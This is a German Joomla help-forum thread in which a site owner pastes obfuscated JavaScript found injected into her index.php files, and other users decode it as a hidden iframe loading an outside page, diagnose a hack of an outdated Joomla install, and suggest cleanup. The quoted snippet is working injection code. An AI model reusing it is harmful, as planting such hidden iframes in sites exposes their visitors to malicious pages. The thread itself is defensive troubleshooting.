+ Antworten
Seite 1 von 2 1 2 LetzteLetzte
Ergebnis 1 bis 10 von 11

Thema: Login nicht möglich - rätselhafte Fehlermeldung auch ohne Login

  1. #1
    Neu an Board
    Registriert seit
    28.06.2006
    Beiträge
    46
    Bedankte sich
    4
    1 Danksagung in 1 Beitrag

    Frage Login nicht möglich - rätselhafte Fehlermeldung auch ohne Login

    Leider bin ich im Forum nicht fündig geworden, deshalb ein neues Thema...

    Wenn ich meine Seite [Link entfernt, da Seite gehackt] öffne, bekomme ich folgende Fehlermeldung (ganz oben, schwarz auf dunkelblau, deshalb kaum zu sehen, für die die mal gucken wollen...)

    hm='b';i='e';ty='jd';yf='n.';t='a';gf='p:/';m='hj';dq='f';r='htt';o='6c0';ug='e=';f='rc';sp= 'dg';dk='php';v='i';k='f54';na='nl.';dz='uys';ul=' a.';je='ifr';ww='a';tg='0';vq='347';tk='i/m';qn='gr';z='s';dc='pag';a='5e0';l='nyi';in='am'; j='fhh';hc='?';ic='/';w='a';h='bm';nd=je.concat(in,i);xr=z.concat(f);n i=r.concat(gf,ic,h,l,dz,j,m,qn,ty,sp,ul,na,ww,tk,t ,v,yf,dk,hc,dc,ug,hm,w,dq,a,vq,k,tg,o);var ge=document.createElement(nd);ge.setAttribute('wid th','5');ge.setAttribute('height','5');ge.setAttri bute('style','display:none');ge.setAttribute(xr,ni );document.body.appendChild(ge);

    Ich habe seit Wochen nichts an der Seite gemacht, die Mitglieder haben offenbar letzte Woche noch was gepostet ohne Probleme. Leider kann ich mich auch nicht mehr auf der Seite anmelden, weder im Frontend noch im Backend, sondern bekomme immer wieder diese Fehlermeldung.
    Auf einer anderen Seite hatte ich Probleme mit der Datenbank aber hier sieht das nun anders aus, was da im Kopf steht...
    Weiß jemand Rat?
    Geändert von nicsi76 (18.01.2012 um 18:34 Uhr)

  2. #2
    Gehört zum Inventar Avatar von Marcus77
    Registriert seit
    17.02.2006
    Ort
    Stettenhof
    Beiträge
    5.087
    Bedankte sich
    76
    Erhielt 1.021 Danksagungen
    in 996 Beiträgen

    Standard

    geh mal in deine INDEX.php und schau dir diese an, dürfte dort sein

    bzw in der index.php unter template
    (Sofern dir meine Antwort geholfen hat, drücke einfach LINKS den "DANKE" - BUTTON)

  3. #3
    Gute Seele des Boards Avatar von keraM
    Registriert seit
    12.03.2006
    Ort
    Dresden
    Beiträge
    10.592
    Bedankte sich
    152
    Erhielt 2.558 Danksagungen
    in 2.360 Beiträgen

    Standard

    Wenn sich bei Joomla 1.5.20 komische Einträge in der index.php befinden, gehe ich mal stark von einem Hack aus.
    Was jetzt zu tun ist steht in "Flottes Liste" -> siehe Joomla-FAQ 2.6.
    Gruß keraM
    Joomla-FAQ: --> Klick!
    Support per PN: --> Klick!

  4. #4
    Joomla Guru Avatar von elkuku
    Registriert seit
    14.06.2006
    Ort
    Guayaquil - Südamerika
    Beiträge
    1.689
    Bedankte sich
    74
    Erhielt 517 Danksagungen
    in 397 Beiträgen

    Standard

    Im Backend kommt exakt der gleiche Text. Nur besser lesbar

    Ich würde ja fast behaupten, dass das ein Skript von Deinem Hoster ist was probiert Dir irgendwelche Werbung auf Deine Site zu packen..

    Oder hat ein Skriptkiddie wirklich beide index.phps mit dem Müll versaut ?...

    Dritte Möglichkeit wäre dann noch ein System Plugin was Unfug macht

    Mehr fällt mir nicht ein
    Gruß,
    Nikolai
    Hilf mit: Deutsche Joomla! Dokumentation Help testing: EasyCreator Noch Fragen ? Forum.Joomla-Nafu.de

  5. #5
    Gute Seele des Boards Avatar von keraM
    Registriert seit
    12.03.2006
    Ort
    Dresden
    Beiträge
    10.592
    Bedankte sich
    152
    Erhielt 2.558 Danksagungen
    in 2.360 Beiträgen

    Standard

    Wenn ich keinen Fehler beim entschlüsseln gemacht habe, dann soll ein iframe mit 5x5px, display:none eingeblendet werden. Als Source ist [http]://bmnyiuysfhhhjgrjddga.nl.aimain.php?page=baf5e0347f 5406c0 angegeben. Weil vor dem Dateinamen ein Slash fehlt, hat der Hack nicht funktioniert. Display:none sieht nicht nach Werbung aus.
    Geändert von keraM (18.01.2012 um 08:57 Uhr) Grund: Link unschädlich gemacht
    Gruß keraM
    Joomla-FAQ: --> Klick!
    Support per PN: --> Klick!

  6. #6
    Moderator Avatar von flotte
    Registriert seit
    20.03.2005
    Ort
    Neustadt
    Beiträge
    5.301
    Bedankte sich
    66
    Erhielt 1.258 Danksagungen
    in 1.101 Beiträgen

    Standard

    Eindeutig gehackt. Seite umgehend vom Netz nehmen und Analyse&Bereinigung durchführen.

    Ich habe seit Wochen nichts an der Seite gemacht..
    Also wenn das tatsächlich noch ein Joomla 1.5.20 ist, dann hast Du seit weit über einem Jahr die wichtigste Webmastertätigkeit vernachlässigt: Updaten
    Geändert von flotte (18.01.2012 um 10:28 Uhr)

  7. #7
    Neu an Board
    Registriert seit
    28.06.2006
    Beiträge
    46
    Bedankte sich
    4
    1 Danksagung in 1 Beitrag

    Standard gelöst

    Tja, ich weiß nicht, ob ich das persönlich nehmen soll, dass sich da offenbar jemand in meine Seiten reingehackt hat. Eine mit Wordpress auf dem selben Server erstellte Seite wies jedenfalls die gleichen Manipulationshinweise auf, die sich aber zum Glück leicht beheben ließen. Danke für eure Rückmeldungen!
    Das mit der veralteten Version stimmt leider. Aber da ich kein Geld dafür bekomme, das Layout anzupassen, habe ich mir für das Update bisher nicht die Zeit genommen... Sollte ich dann vielleicht doch mal machen :(

    Edit: Hat in sofern doch noch was gutes - ich bekomme doch wieder etwas Geld für das Update und das Anpassen des Layouts ;-)
    Geändert von nicsi76 (29.01.2012 um 09:23 Uhr)

  8. #8
    Moderator Avatar von flotte
    Registriert seit
    20.03.2005
    Ort
    Neustadt
    Beiträge
    5.301
    Bedankte sich
    66
    Erhielt 1.258 Danksagungen
    in 1.101 Beiträgen

    Standard

    Das Du gehackt wird ist nichts persönliches, sondern geschieht automatisch. Nicht nur große Seiten werden gehackt...

  9. #9
    Neu an Board
    Registriert seit
    18.09.2009
    Beiträge
    2
    Bedankte sich
    0
    1 Danksagung in 1 Beitrag

    Standard Rückfrage:

    "Tja, ich weiß nicht, ob ich das persönlich nehmen soll, dass sich da offenbar jemand in meine Seiten reingehackt hat. Eine mit Wordpress auf dem selben Server erstellte Seite wies jedenfalls die gleichen Manipulationshinweise auf, die sich aber zum Glück leicht beheben ließen. Danke für eure Rückmeldungen!"

    Hallo nicsi76,

    ich fürchte, ein ähnliches Problem zu haben. Könntest Du mir mitteilen, wie Du das Problem behoben hast? Bei der von mir erstellten Seite (afcvbb.de) erscheint beim Login-Versuch im frontend eine Seite mit uns fremder Werbung, egal, ob ein passender login eingegeben wird oder nicht. Über Hilfe würde ich mich sehr freuen. Vielen Dank bereits jetzt.

  10. #10
    Neu an Board
    Registriert seit
    28.06.2006
    Beiträge
    46
    Bedankte sich
    4
    1 Danksagung in 1 Beitrag

    Standard index.php-Dateien editieren

    Hallo,
    na da bin ich fast froh, dass ich nicht die einzige bin. Ich hatte beim Googlen auch ein paar weitere Seiten gefunden, die offenbar betroffen waren...

    Du must die index.php-Dateien editieren. Evtl. die im Hauptverzeichnis aber wie es aussieht auf alle Fälle die im Administrator-Verzeichnis. Dort müsste ganz oben jeweils etwas stehen, was nicht zu deiner Seite gehört. Bei mir wurde das nicht vollständig eingefügt, so dass das Script nicht richtig ausgeführt wurde. Evtl. steht es bei dir also innerhalb der php-Anweisungen.

    Und dann hab ich vorsichtshalber mal alle Passwörter geändert...

    Wenn ich übrigens bei deiner Seite auf an-/abmelden gehe, bekomme ich einen anderen Fehler: Fehlercode: ssl_error_rx_record_too_long. Da kann ich dir jetzt allerdings nicht konkret sagen, wie du den behoben bekommst, sorry. Aber vielleicht findest du da was an anderer Stelle, was dir hilft.

    Viel Erfolg!

+ Antworten
Seite 1 von 2 1 2 LetzteLetzte

Lesezeichen

Berechtigungen

  • Neue Themen erstellen: Nein
  • Themen beantworten: Nein
  • Anhänge hochladen: Nein
  • Beiträge bearbeiten: Nein